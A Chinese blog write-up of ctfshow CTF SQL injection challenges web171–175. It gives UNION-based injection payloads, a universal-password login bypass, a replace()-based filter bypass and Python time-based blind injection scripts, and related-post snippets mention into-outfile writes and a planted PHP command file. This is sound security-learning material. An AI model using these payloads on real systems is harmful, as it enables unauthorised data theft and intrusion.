ctfshow-web入门-sql注入(web171-web175)

已于 2024-08-01 11:08:41 修改
阅读量1.4k 收藏 38
点赞数 40
分类专栏: ctfshow web SQL 文章标签: sql 数据库 学习 web安全 开发语言 python
于 2024-07-31 22:57:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/140819830
版权
web 同时被 3 个专栏收录
189 篇文章 25 订阅
订阅专栏
ctfshow
82 篇文章 3 订阅
订阅专栏
SQL
33 篇文章 2 订阅
订阅专栏

目录

1、web171

2、web172

3、web173

4、web174

5、web175

1、web171

单引号测一下,报错 

--+ 闭合后回显正常 

也可以用 # ,不过需要 URL 编码

成功闭合之后,先判断下字段数:

1' order by 3--+

3 的时候正常 

4 的时候报错,说明只有 3 列 

 测了一下,三个回显位都能正常回显:

0' union select 1,2,3--+

先查一下基本信息: 

0' union select database(),user(),version()--+

当前数据库名为 ctfshow_web 

这里说明一下,因为 mysql 5.0 及其以上的都会自带一个叫 information_schema 的数据库,相当于是一个已知的数据库,并且该数据库下储存了所有数据库的所以信息。 

查该数据库下的所有表:

0' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='ctfshow_web'--+

其中 2 和 3  只是占位符  

可以看到存在一个名为 ctfshow_user 的表,我们继续查该表下的列名:

0' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user'--+

没看到 flag 这种关键字,因此我们 id,username,password 都查一下:

0' union select id,username,password from ctfshow_web.ctfshow_user--+

最终在 id 为 26 的 password 里找到 flag:ctfshow{64dd0daa-4600-4813-8ef2-cffa99a6f05f} 

当然这种没有绕过的给到 sqlmap 就直接一把嗦了,这里简便的方法也可以采用万能密码:

1'or 1 --+

2、web172

在无过滤注入 1 里面用万能密码未找到 flag

试一下注入 2 的,经过测试这里的回显位只有两个

数据库都懒得查了,用 database() 代替,直接查表:

0' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--+

新增了一个 ctfshow_user2 的表,查一下该表下面内容,注意这里有一个检查,要求 username 的内容不能是 flag,才能正常查询成功,那么我们就不查 username ,查 id 和 password 就行了:

0' union select id,password from ctfshow_user2--+

当然也可以只查 password:

0' union select 1,password from ctfshow_user2--+

拿到 flag:ctfshow{97bd5892-2617-417a-8c2e-16134f741704}

如果查询内容有 username,因为 username 里包含了 'flag',因此无法正常回显 flag 的内容:

3、web173

判断一下这次又是三个字段数了,根据前面的规律,这次的表名应该是:ctfshow_web.ctfshow_user3,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。

payload:

只查 password

0' union select 1,2,password from ctfshow_web.ctfshow_user3--+

查 id 与 password 

0' union select id,2,password from ctfshow_web.ctfshow_user3--+

拿到 flag:ctfshow{eff707be-5727-412e-93be-2c75e5783fa5}

4、web174

还没查就报错了

这里有点问题,手动改一下请求文件为:select-no-waf-4.php

可以发现这里查询结果的输出不能出现数字

查询语句的内容也不能出现数字

可以查到数据库名:ctfshow_web ,因为数据库名里没有数字

但是查表名就不行了,根据前面规律,表名应该为 ctfshow_user4,包含了数字,所以结果出不来,不能直接查。 

0' union select group_concat(table_name),'a' from information_schema.tables where table_schema=database()--+

对输出结果进行替换后再输出,将数字都替换成字母,payload:

0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(group_concat(table_name),'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'a' from information_schema.tables where table_schema=database()--+

查询结果为:ctfshow_userD 

D 对应的是 4 ,因此表名为:ctfshow_user4 

查询 password:

0' union select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'a' from ctfshow_user4--+

得到:ctfshow{eIdGcBcc-cACA-DEIF-aGcB-aAJGdJddGBCe}

最后将查询结果的数字替换回去,也可以用 replace 函数,反过来即可。

这里用 python 实现:

def rev_replace(txt):
    repl = {
        'A': '1',
        'B': '2',
        'C': '3',
        'D': '4',
        'E': '5',
        'F': '6',
        'G': '7',
        'H': '8',
        'I': '9',
        'J': '0'
    }

    for k, v in repl.items():
        txt = txt.replace(k, v)

    return txt

txt = input("输入:")
out = rev_replace(txt)
print("替换后: ", out)

拿到 flag:ctfshow{e9d7c2cc-c131-4596-a7c2-a107d0dd723e}

5、web175

正常的查 1 都没有回显

if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

正则匹配过滤掉的是所有 ASCII 字符(从 \x00 到 \x7f,也就是从 0 到 127 的所有字符,包括控制字符、数字、字母和符号)。

因此这里采用时间盲注,先测试一下:

1' and sleep(5)--+

观察页面确实存在延时 

我个人比较菜,然后一直都是脚本小子,这次自己来写一下,希望能更好的理解下时间盲注。 

首先看了下它这里除了查询的 id,还有另外的两个参数,这个我们在写脚本时也需要加进去,并且注意到,它调用的接口其实是 /api 下的 v5.php,而不是 select-no-waf-5.php 这个文件哦。

接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。

关于 burpsuite 用来爆破这种时间盲注,以及一些原理可以参考我之前的博客:

关于SQL时间盲注(基于sleep函数)的手动测试、burpsuite爆破、sqlmap全自动化注入_sql 语句 and sleep-CSDN博客icon-default.png?t=N7T8https://blog.csdn.net/Myon5/article/details/135241105?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522172242605416800175758093%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=172242605416800175758093&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-2-135241105-null-null.nonecase&utm_term=%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450payload:

1' and if(length(database())=11,sleep(3),0) --+
import requests

url = 'http://e03daa7b-66ad-48fb-8349-da520b7f5fe8.challenge.ctf.show/api/v5.php'
i = 0
for i in range(1, 15):
    payload = f"id=1' and if(length(database())={i},sleep(3),0) --+&page=1&limit=10"
    # print(payload)
    re = requests.get(url, params=payload)
    time = re.elapsed.total_seconds()
    print(f"{i}:{time}")
    # print(re.url)

可以看到当数据库名长度为 11 时,响应存在延时,这与我们前面得到的数据库名为:ctfshow_web,长度就是 11符合。

下面使用两个 for 循环遍历数据库名,从第一个字符猜到第 11 个字符,字符的可能性这里字典设置的是小写字母加数字加下划线:

import requests
import string

url = 'http://2e5bbcf3-38df-43a5-b8a5-710f30ae9957.challenge.ctf.show/api/v5.php'
dic = string.ascii_lowercase + string.digits + '_'
out = ''
for j in range(1, 12):
    for k in dic:
        payload = f"id=1' and if(substr(database(),{j},1)='{k}',sleep(3),0) --+&page=1&limit=10"
        # print(payload)
        re = requests.get(url, params=payload)
        time = re.elapsed.total_seconds()
        # print(f"{j}:{time}")
        if time > 2:
            print(k) 
            out += k #响应延时则将猜测的字符添加到结果里
            break #跳出内层的for循环,继续遍历下一位
print(out)

跑完得到数据库名为:ctfshow_web

接下来我们继续猜表名,这里就不先判断表名的长度了,设置范围大一点,以确保完整输出数据,使用标志位来判断是否到了最后一位:

import requests
import string

url = 'http://2e5bbcf3-38df-43a5-b8a5-710f30ae9957.challenge.ctf.show/api/v5.php'
dic = string.ascii_lowercase + string.digits + '_'
out = ''
for j in range(1, 30):
    a = 1 #设置一个标志位,用来判断是否已经猜到了最后一位
    for k in dic:
        # payload = f"id=1' and if(substr(database(),{j},1)='{k}',sleep(3),0) --+&page=1&limit=10"
        payload = f"id=1' and if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"
        # print(payload)
        re = requests.get(url, params=payload)
        time = re.elapsed.total_seconds()
        # print(f"{j}:{time}")
        if time > 2:
            print(k)
            a = 0 #如果找到字符,则将标志位置0
            out += k
            break #跳出内层的for循环,继续遍历下一位
    if a == 1: #在进行下一次循环前,先判断当前字符是否找到
        break #若没有找到,则跳出外层循环,表示我们已经到了最后一个字符
print(out)

得到表名为:ctfshow_user5

我们可以通过调整 limit 的参数来获取到其他的表名,有时候也可以使用 group_concat 函数。

payload = f"id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

在 SQL 中,LIMIT 子句用于指定查询结果中返回的行数,用法:

LIMIT offset, count

offset 是要跳过的行数,offset 从 0 开始计数,count 是要返回的行数。

比如:

LIMIT 0, 1

从查询结果的第 0 行(即第一行)开始,返回 1 行结果,即返回了查询结果的第一行。

LIMIT 1, 1

从查询结果的第 1 行(即第二行)开始,返回 1 行结果,即返回了查询结果的第二行。

这里尝试找第二行,发现一会代码就结束了,说明这里只有一个表:

接下来查列名:

payload = f"id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user5'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。

注释掉最后两句判断结束的语句即可输出完整结果:

也可以通过 limit 来指定查询第三行的内容:

payload = f"id=1' and if(substr((select column_name from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user5' limit 2, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

因为我编程能力确实很差,所以这个代码还是存在很多问题的,需要继续改进和完善。

由于前面的题目,我们知道 flag 在 password 字段里,那么我们就查它:

由于 flag 不在第一行,因此我们再细化查询的条件,即 username='flag'

payload = f"id=1' and if(substr((select password from ctfshow_web.ctfshow_user5 where username='flag'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

因为 flag 内容还包括了大括号和减号,为了避免提早结束,我们拓展下字典:

dic = string.ascii_lowercase + string.digits + '_-{}'

结果的长度也得扩展:

for j in range(1, 100):

最终的脚本:

import requests
import string

url = 'http://2e5bbcf3-38df-43a5-b8a5-710f30ae9957.challenge.ctf.show/api/v5.php'
dic = string.ascii_lowercase + string.digits + '_-{}'
out = ''
for j in range(1, 100):
    a = 1 #设置一个标志位,用来判断是否已经猜到了最后一位
    for k in dic:
        # payload = f"id=1' and if(substr(database(),{j},1)='{k}',sleep(3),0) --+&page=1&limit=10" # 猜数据库名
        # payload = f"id=1' and if(substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit 0, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10" #猜表名
        # payload = f"id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10" #猜表名
        # payload = f"id=1' and if(substr((select column_name from information_schema.columns where table_schema='ctfshow_web'and table_name='ctfshow_user5' limit 2, 1), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"  # 猜列名
        payload = f"id=1' and if(substr((select password from ctfshow_web.ctfshow_user5 where username='flag'), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"  # 猜具体字段
        # print(payload)
        re = requests.get(url, params=payload)
        time = re.elapsed.total_seconds()
        # print(f"{j}:{time}")
        if time > 2:
            print(k)
            a = 0 #如果找到字符,则将标志位置0
            out += k
            break #跳出内层的for循环,继续遍历下一位
    if a == 1: #在进行下一次循环前,先判断当前字符是否找到
        break #若没有找到,则跳出外层循环,表示我们已经到了最后一个字符
print(out)

拿到 flag:ctfshow{d6c5132a-3611-4cd3-a840-37e6a68ac6dd}

同理,当我们注释掉最后两行判断结束的代码,并使用 group_concat,就算不追加 username='flag' 的条件,也是可以查到 flag 的,不过这个时间就比较久了,因为我们查的是所有的数据:

payload = f"id=1' and if(substr((select group_concat(password) from ctfshow_web.ctfshow_user5), {j}, 1) = '{k}',sleep(3),0) --+&page=1&limit=10"

大致就这样吧,不敢相信我竟然自己写了个盲注的脚本,还加了那么多注释和个人理解,我知道我的代码写得不好,因为还在慢慢学习嘛,对于时间盲注其实更高效的查询方法是二分法查询,这次我主要是练习下自己动手写代码的能力,如果你也是不会写代码,认真看完相信你也能收获些东西的,最后附上二分法查找的代码和注释,写的不好,互相学习吧:

import requests

url = 'http://de93f700-084d-447e-a783-efdbd7efc984.challenge.ctf.show/api/v5.php'
out = ''
for i in range(1, 100):
    left, right = 32, 128  # 设置ASCII值的搜索范围
    mid = (left + right) // 2  # 计算中间值
    while left < right:
        # 这里用ascii函数来获取当前字符的ASCII值,与中间值进行比较,注意这条语句是sql中的用法,在python里获取ascii值是用ord函数
        payload = f"id=1' and if(ascii(substr((select group_concat(password) from ctfshow_web.ctfshow_user5 where username='flag'), {i}, 1)) > {mid},sleep(3),0) --+&page=1&limit=10"
        re = requests.get(url, params=payload)
        time = re.elapsed.total_seconds()
        if time > 2:  # 存在延时,说明当前字符的ascii值大于我们的中间值
            left = mid + 1  # 调整查找的范围,既然大于那说明ascii值是在中间值的右边,将中间值加1
        else:  # 不存在延时,说明当前字符的ascii值小于中间值,在左边
            right = mid  # 左边起始位置不变,将右边的查找范围调整为中间值
        mid = (left + right) // 2  # 无论查询字符在左边还是右边,中间值都等于更新后的right+left再整除2,之后继续执行while循环,直到找到目标字符的ascii值,left=right,退出while循环
    print(mid)  
    out += chr(mid)
    print(out)

 看完感觉有收获的可以给我个赞或者关注吗哈哈哈,感谢支持!我们下篇博客再见。

ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 326
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 403
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
ctfshow SQL注入Web175
m0_62584974的博客
05-01 923
查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 返回逻辑 //检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; } Play...
CTFshow学习笔记---sql盲注:web-174
最新发布
wecanning的博客
09-29 1458
sql盲注
ctfshow_web175
qq_38634097的博客
05-28 410
0-127表示单字节字符:数字,英文字符,半角符号,以及某些控制字符。那我们换个思路,不让在页面显示,写在某个文件里,然后查看文件内容。\xnn 匹配ASCII代码中十六进制代码为nn的字符。[x00-x7f] 匹配ASCII值从0-127的字符。打开场景可以看到在本题中,页面的拦截方式做了改变。也就说,是以上字符的不会在页面显示出来。
CTFshow-web入门171sql注入
Hunter909的博客
10-12 179
username若是对于flag就会被屏蔽、隐藏(没有办法去改变username!=flag),但是会发现ID排序是有顺序的,就可以慢慢试id = 25,id = 26......发现id=26时,flag会出来。因为$sql = "select username,password from user where username!这里是具有sql注入漏洞的,它这里没有限定条件,直接运用简单的sql注入把隐藏的flag找出来就行。
CTFSHOW web入门——web171
m0_74093152的博客
03-26 460
查询用户名为flag的信息 1' union select id,username,password from ctfshow_user where username='flag' --+然后查询库名 1' union select 1,2,database() --+首先查询有多少列,1' order by 3--+查看ctfshow_web库的表。
ctfshow web175-183
akxnxbshai的博客
03-14 6155
Web 175 if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))) 刚开始不知道这句话是什莫意思,还在尝试之前的方法,发现没用。 \xnn 匹配ASCII代码中十六进制代码为nn的字符 [\x00-\x7f] 匹配ASCII值从0-127的字符 所以ASCII值得0-127都被过滤了,select没法用了。 只能盲注了,试一下 1' and sleep(6)--+ 发现确实有延迟,所以可以考虑时间盲注。 时间盲注: 通过时间
CTFshow web入门web171-sql1
weixin_74336671的博客
10-25 156
说明到3就没有了,直接进行union查询 (此时将1改为-1)本题考察sql注入联合查询union select。继续到1‘ order by 4--+首先我们试着注入1‘ and 1=1’继续到1‘ order by 3--+回显异常,说明存在注入。
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 681
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 1083
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库web2。
CTFSHOW-WEB入门代码审计篇
Re_ly0n的博客
11-02 516
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
CTFshow--web入门171-184)
2402_82963715的博客
07-28 1427
CTFshow--web入门171-184的wp。
CTFshow 175 into outfile ‘/var/www/html/1.txt‘
sinat_31884905的博客
05-23 323
[x00-x7f] 匹配ASCII值从0-127的字符 0-127表示单字节字符,也就是:数字,英文字符,半角符号,以及某些控制字符。 限制了页面不能显示任何数据, ?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10 就跳到这里了,真的很神奇,所以说 select xxx from xxx into outfile '/var/
CTFshow web(sql注入171-175
csjjjd的博客
02-20 881
替换:将数据to_base64加密,然后将里面所有的数字用replace()替换。注意这里已经提示你了,只要知道是ctfshow_user,就可以拿到flag。然后接着一个个查询看看哪个表里面有flag,经测试,第二个表有flag。ps:注意把ctfshow后面的都删去,改成1.txt。那个过滤函数别被骗了,照样该怎么做怎么做。还是那个语句查询表名。还是那个语句查询表名。base64解码就好。
ctfshow-web175详细解答
weixin_68408599的博客
04-22 386
打开hackbar在里面post传值中输入1=phpinfo();抓包显示输入错误,在头部ctf.show/后输入1.php(植入的文件)1=system("ls");可以看见api目录,进入1=system("ls ./api/");传递,$_POST[1]参数包含一串可执行代码,然后使用此参数调用。信息都已经出来,在蚁剑中进行数据操作得到以下数据。通过此条语句进行植入代码,代码将作为。
ctfshow sql注入 171~
shinygod的博客
03-30 734
ctfshow sql 爆表:-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="ctfshow_web";--+ 爆列:-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_nam
CTFshow_Web_SQL注入——web171~web190
Ho1aAs‘s Blog
04-08 1890
文章目录题解web 171web 172web 173web 174web 175web 176web 177web 178web 179web 180-182web 183web 184web 185-186web 187web 188web 189web 190完 题解 web 171 基础 [GET]PAYLOAD: ?id=0' union select 1,2,password from ctfshow_user where username='flag' --+ web 172 过滤 flag
CTFSHOW web入门 sql注入 无过滤注入 web171-175
sinat_41572027的博客
07-07 1694
ctfshow web171-174
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1.了解Web基础知识,例如HTTP协议、HTML、CSS、JavaScript等。 2.学习Web漏洞,例如SQL注入、XSS、CSRF等。 3.掌握一些常用的Web工具,例如Burp Suite、sqlmap、dirbuster等。 4.多练习,多尝试,多思考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My6n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值